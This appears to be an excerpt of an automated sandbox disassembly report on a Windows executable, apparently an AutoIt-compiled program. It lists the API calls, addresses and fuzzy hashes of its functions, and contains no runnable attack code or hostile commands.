                                                                        • GetMenuItemCount.USER32(00000000), ref: 00ED8577
                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00ED859F
                                                                        • GetMenuItemID.USER32(?,?), ref: 00ED860E
                                                                        • GetSubMenu.USER32(?,?), ref: 00ED861C
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00ED866D
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                        • String ID:
                                                                        • API String ID: 650687236-0
                                                                        • Opcode ID: 361525bed7f9bc463e272c7ce17af70564a82f40c4f9c27e90303c772e46acd7
                                                                        • Instruction ID: ecb433ccaec48627437611e7f33e5932da4b73c829790027914723f2b75828d6
                                                                        • Opcode Fuzzy Hash: 361525bed7f9bc463e272c7ce17af70564a82f40c4f9c27e90303c772e46acd7
                                                                        • Instruction Fuzzy Hash: 46518E75A00215AFCF11EF68C941AEEBBF5EF48320F10549AE915BB351CB70AE42CB90
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB4B10
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4B5B
                                                                        • IsMenu.USER32(00000000), ref: 00EB4B7B
                                                                        • CreatePopupMenu.USER32 ref: 00EB4BAF
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00EB4C0D
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EB4C3E
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: dc9027f2e5149f64b985cc2b7d8daac971a9891f9cfeeaa4270dec7b7ea73b6e
                                                                        • Instruction ID: f1e1dcf3ef9d4000874a409879ba287a25614616b2c8116ff0beafb24c879f17
                                                                        • Opcode Fuzzy Hash: dc9027f2e5149f64b985cc2b7d8daac971a9891f9cfeeaa4270dec7b7ea73b6e
                                                                        • Instruction Fuzzy Hash: B951CBB0601209EFEF20CF68C988BEEBFF4AF44718F145159E555BA2D2E3709944CB51
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00F0DC00), ref: 00EC8E7C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8E89
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00EC8EAD
                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00EC8EC5
                                                                        • _strlen.LIBCMT ref: 00EC8EF7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8F6A
                                                                        Similarity
                                                                        • API ID: ErrorLast$_strlenselect
                                                                        • String ID:
                                                                        • API String ID: 2217125717-0
                                                                        • Opcode ID: 34a38be9607c4b541d5d6e8c560684fcdcde311cd552df63be290894599c7468
                                                                        • Instruction ID: 2d962b724bda5c8ef4882eac04fd4255dc021ba2e670ae943453b32993fc9b43
                                                                        • Opcode Fuzzy Hash: 34a38be9607c4b541d5d6e8c560684fcdcde311cd552df63be290894599c7468
                                                                        • Instruction Fuzzy Hash: 5D41A071600108AFCB14EBA4CE85FAEB7FAAF48314F10515DF51AB7291DB30AE01CB60
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • BeginPaint.USER32(?,?,?), ref: 00E8AC2A
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8AC8E
                                                                        • ScreenToClient.USER32(?,?), ref: 00E8ACAB
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8ACBC
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00E8AD06
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00EEE673
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: cd11ba31d22e83220724c6ce8555aa35f1814fd74bc13d2568fea7e8f8ee5dce
                                                                        • Instruction ID: 09f463932eb44c06aa9d119be98140f6939e2fcf934597bdf91a278c83f2d8cb
                                                                        • Opcode Fuzzy Hash: cd11ba31d22e83220724c6ce8555aa35f1814fd74bc13d2568fea7e8f8ee5dce
                                                                        • Instruction Fuzzy Hash: 6941DE701043059FD710EF65CC85FB67BE9FB59324F08122AF9A8A72A1C330A844DB62
                                                                        APIs
                                                                        • ShowWindow.USER32(00F31628,00000000,00F31628,00000000,00000000,00F31628,?,00EEDC5D,00000000,?,00000000,00000000,00000000,?,00EEDAD1,00000004), ref: 00EDE40B
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00EDE42F
                                                                        • ShowWindow.USER32(00F31628,00000000), ref: 00EDE48F
                                                                        • ShowWindow.USER32(00000000,00000004), ref: 00EDE4A1
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00EDE4C5
                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EDE4E8
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 4758ce72135f265bca0a4a001534f168d4a80294404fd9753dcc9f688446c65c
                                                                        • Instruction ID: c24601a6281fe0f0e0c565983ed933aaf19ddb352d725559470128a9642eddd6
                                                                        • Opcode Fuzzy Hash: 4758ce72135f265bca0a4a001534f168d4a80294404fd9753dcc9f688446c65c
                                                                        • Instruction Fuzzy Hash: C3417230601140EFDB21DF24C49DBA47BE1FF45308F1891AAEA68AF3A2C731A846CB51
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EB98D1
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EB9908
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00EB9924
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00EB999E
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EB99B3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB99D2
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 2537439066-0
                                                                        • Opcode ID: 5db8b2a2123edf2a428e0e2fd3368ab2e13b36422a0d42984e5ea10e5c072fae
                                                                        • Instruction ID: df31b3a85c271648fb07b6c7bc9fd6dc2be648254c08f5b055ce2d23802b7455
                                                                        • Opcode Fuzzy Hash: 5db8b2a2123edf2a428e0e2fd3368ab2e13b36422a0d42984e5ea10e5c072fae
                                                                        • Instruction Fuzzy Hash: CB316F31900105AFDB10AFA5DC85EAFBBB9FF85310B1480A9F908BB256D774DE14DBA0
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EC77F4,?,?,00000000,00000001), ref: 00EC9B53
                                                                          • Part of subcall function 00EC6544: GetWindowRect.USER32(?,?), ref: 00EC6557
                                                                        • GetDesktopWindow.USER32 ref: 00EC9B7D
                                                                        • GetWindowRect.USER32(00000000), ref: 00EC9B84
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EC9BB6
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        • GetCursorPos.USER32(?), ref: 00EC9BE2
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EC9C44
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: 6b5a6265fe8770c8f29a783f96ebf2d15d224e0344395059ce41819c0dcadc0b
                                                                        • Instruction ID: a0ffdfbc6900bd8734a78a32362c7c2be91e3ac7814e294788869ae83ba5fadf
                                                                        • Opcode Fuzzy Hash: 6b5a6265fe8770c8f29a783f96ebf2d15d224e0344395059ce41819c0dcadc0b
                                                                        • Instruction Fuzzy Hash: 2A31BC72108315AFC710DF149C49FABBBEAFF88314F00091AF585E7182DA31EA09CB92
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EAAFAE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00EAAFB5
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EAAFC4
                                                                        • CloseHandle.KERNEL32(00000004), ref: 00EAAFCF
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EAAFFE
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EAB012
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: a95262a53e7b3d67db6dcb6efd151c46edaab729c3048dde82fa13860c75eda5
                                                                        • Instruction ID: 2e36fd59e4f8a30541ce0c528036900a40b49b2e8f51d0508d6bbb0d6e989967
                                                                        • Opcode Fuzzy Hash: a95262a53e7b3d67db6dcb6efd151c46edaab729c3048dde82fa13860c75eda5
                                                                        • Instruction Fuzzy Hash: 97217F72105309AFDB128F94DD09BEE7BAAEF49308F084025FA01BA161C375AD24EB61
                                                                        APIs
                                                                          • Part of subcall function 00E8AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                          • Part of subcall function 00E8AF83: BeginPath.GDI32(?), ref: 00E8B009
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EDEC20
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00EDEC34
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EDEC42
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00EDEC52
                                                                        • EndPath.GDI32(00000000), ref: 00EDEC62
                                                                        • StrokePath.GDI32(00000000), ref: 00EDEC72
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: 25c98aa31b5221e19191b9e2b9345fbde58ed37fd6466602c2a54ef65fbb32cb
                                                                        • Instruction ID: a1fb6e00c37a4913125d888dd2d5dfd3e461893e0e6e86ddcb4e9b28895bc948
                                                                        • Opcode Fuzzy Hash: 25c98aa31b5221e19191b9e2b9345fbde58ed37fd6466602c2a54ef65fbb32cb
                                                                        • Instruction Fuzzy Hash: 6611DE7200414DBFEF129F91DD88EEA7F6EEB08354F048112BE1969260D7719D55DBA0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00EAE1C0
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EAE1D1
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAE1D8
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EAE1E0
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EAE1F7
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00EAE209
                                                                          • Part of subcall function 00EA9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EA9A05,00000000,00000000,?,00EA9DDB), ref: 00EAA53A
                                                                        Similarity
                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                        • String ID:
                                                                        • API String ID: 603618608-0
                                                                        • Opcode ID: 270db52db542fec028d53cf749a3b4de36dbba9ecc4adf2ed5059b5c8827960b
                                                                        • Instruction ID: b72170752aed7818d8c09eacda6a076097e3e68e1475e6e08ed2fa2366a69acc
                                                                        • Opcode Fuzzy Hash: 270db52db542fec028d53cf749a3b4de36dbba9ecc4adf2ed5059b5c8827960b
                                                                        • Instruction Fuzzy Hash: C20184B5A00214BFEB109FA68C45B5EBFB9EB89751F004066EA04FB390DA709C01CB60
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E7281D
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E72825
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E72830
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E7283B
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E72843
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7284B
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1423608774-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EB7C07
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EB7C1D
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00EB7C2C
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C3B
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C45
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C4C
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00EB9A33
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A44
                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A51
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A5E
                                                                          • Part of subcall function 00EB93D1: CloseHandle.KERNEL32(?,?,00EB9A6B,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB93DB
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB9A71
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A78
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        APIs
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • __swprintf.LIBCMT ref: 00E71EA6
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E71D49
                                                                        Similarity
                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 2125237772-557222456
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECB006
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ECB115
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECB298
                                                                          • Part of subcall function 00EB9DC5: VariantInit.OLEAUT32(00000000), ref: 00EB9E05
                                                                          • Part of subcall function 00EB9DC5: VariantCopy.OLEAUT32(?,?), ref: 00EB9E0E
                                                                          • Part of subcall function 00EB9DC5: VariantClear.OLEAUT32(?), ref: 00EB9E1A
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        APIs
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • _memset.LIBCMT ref: 00EB5438
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EB5467
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EB5513
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EB553D
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB027B
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EB02B1
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EB02C2
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EB0344
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB5075
                                                                        • GetMenuItemInfoW.USER32 ref: 00EB5091
                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00EB50D7
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F31708,00000000), ref: 00EB5120
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00ED0587
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 2358735015-567219261
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EAB88E
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EAB8A1
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EAB8D1
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 5634bc9967e1b11cc96e74401e707754e8bb65f8327bd4b5b146dea319a5bdc4
                                                                        • Instruction ID: 26393f0946c12b31d7ddabdbd848056a76648a499e6929ebd4ff11ce99774d99
                                                                        • Opcode Fuzzy Hash: 5634bc9967e1b11cc96e74401e707754e8bb65f8327bd4b5b146dea319a5bdc4
                                                                        • Instruction Fuzzy Hash: 7F21B671900104BFD708ABB8DC469FE77BDDF4A354B105119F01ABA1D1DB785D0A9750
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EC4401
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC4427
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EC4457
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EC449E
                                                                          • Part of subcall function 00EC5052: GetLastError.KERNEL32(?,?,00EC43CC,00000000,00000000,00000001), ref: 00EC5067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 1951874230-3916222277
                                                                        • Opcode ID: 27cd46817ca0611dd0884bde74801fad98af64cdeb5ef93ef228aece2b49ce26
                                                                        • Instruction ID: ce70d7d1124d12138368cf31c63cf904ccbea103d5d6f0760e4e012bb8d0e66a
                                                                        • Opcode Fuzzy Hash: 27cd46817ca0611dd0884bde74801fad98af64cdeb5ef93ef228aece2b49ce26
                                                                        • Instruction Fuzzy Hash: 9A21D0F2500208BEE711AF54CD91FBBBAECFB88758F20901EF115F6180EA619D069770
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00ED915C
                                                                        • LoadLibraryW.KERNEL32(?), ref: 00ED9163
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00ED9178
                                                                        • DestroyWindow.USER32(?), ref: 00ED9180
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 6cf92ff8cd241ac090c937c33bdb25eaa1427c5a590e09f1832f36843ac3821d
                                                                        • Instruction ID: 8affc6228f036a885f3ec2f955c7a4fd1da56ddc64b8511133a5f9752436ab2a
                                                                        • Opcode Fuzzy Hash: 6cf92ff8cd241ac090c937c33bdb25eaa1427c5a590e09f1832f36843ac3821d
                                                                        • Instruction Fuzzy Hash: CF21CF71200206BFEF104E64DC88EBB37ADEF99368F11161AF914B6291C731DC42A760
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EB9588
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EB95B9
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EB95CB
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EB9605
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: a356704f6ee1744461921f4e74555aec6fe4b6ede501fa23f6db8454c8b26759
                                                                        • Instruction ID: 4d735349ac4226ae4f671c0b77b3e1a2016c969002aa1e4b7cdfdaa8abb11283
                                                                        • Opcode Fuzzy Hash: a356704f6ee1744461921f4e74555aec6fe4b6ede501fa23f6db8454c8b26759
                                                                        • Instruction Fuzzy Hash: 48219C70641205ABEB219F25DC04ADB7BE8AF84324F205A19FAA5F72E1D770D944CB60
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EB9653
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EB9683
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EB9694
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EB96CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 993ab5a3310f3de651974dc19ff20ada874798cd7389241b1586564b6ba447a2
                                                                        • Instruction ID: c300ee2f0de2d7aef6d809553390c8a35f829a3c3c7a3ff56860a3a195067b4f
                                                                        • Opcode Fuzzy Hash: 993ab5a3310f3de651974dc19ff20ada874798cd7389241b1586564b6ba447a2
                                                                        • Instruction Fuzzy Hash: DC21A1715002059FDB209F699C45EDB77E8AF94724F201A18FAA1F72E5E770D845CB50
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBDB0A
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EBDB5E
                                                                        • __swprintf.LIBCMT ref: 00EBDB77
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0DC00), ref: 00EBDBB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu
                                                                        • API String ID: 3164766367-685833217
                                                                        • Opcode ID: 8bf48024475670b53b10bc84186e9bdc33545bce48142f98d19a453e2087b3a4
                                                                        • Instruction ID: 2d6c62531234ef7da44843dafb516f7f06f03af393751a5aa529c221965ff774
                                                                        • Opcode Fuzzy Hash: 8bf48024475670b53b10bc84186e9bdc33545bce48142f98d19a453e2087b3a4
                                                                        • Instruction Fuzzy Hash: CB217135600108AFCB10EFA5CD85DEEBBF9EF89704B104069F609E7251DB70EA05DB61
                                                                        APIs
                                                                          • Part of subcall function 00EAC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EAC84A
                                                                          • Part of subcall function 00EAC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAC85D
                                                                          • Part of subcall function 00EAC82D: GetCurrentThreadId.KERNEL32 ref: 00EAC864
                                                                          • Part of subcall function 00EAC82D: AttachThreadInput.USER32(00000000), ref: 00EAC86B
                                                                        • GetFocus.USER32 ref: 00EACA05
                                                                          • Part of subcall function 00EAC876: GetParent.USER32(?), ref: 00EAC884
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EACA4E
